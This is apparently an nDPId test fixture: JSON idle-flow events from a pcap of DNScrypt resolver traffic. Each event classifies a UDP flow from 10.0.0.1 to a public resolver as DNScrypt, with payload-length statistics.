-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312178,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":41913,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1392,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":60301,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396069,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":41108,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348800,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38709,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304396,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44491,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396047,"flow_last_seen":946739396074,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"144.91.106.227","src_port":55469,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":43528,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337218,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":40748,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311312,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":55822,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396109,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33246,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":46063,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312180,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":37890,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312106,"flow_last_seen":946739312136,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":60735,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311313,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":51770,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396107,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":33293,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400522,"flow_last_seen":946739400551,"flow_idle_time":200000,"flow_min_l4_payload_len":192,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":704,"flow_avg_l4_payload_len":352,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"77.66.84.233","src_port":49732,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":56688,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739402188,"flow_last_seen":946739402356,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"23.111.74.205","src_port":60852,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337186,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45613,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":59489,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317825,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304393,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":56997,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304394,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":44712,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400522,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":47971,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391306,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":45682,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739400460,"flow_last_seen":946739400519,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.193.127.244","src_port":50062,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304369,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":55123,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739391046,"flow_last_seen":946739391046,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":49796,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337190,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":45747,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317496,"flow_last_seen":946739317819,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739317432,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"176.56.237.171","src_port":48325,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312402,"flow_last_seen":946739312466,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380805,"flow_last_seen":946739380838,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 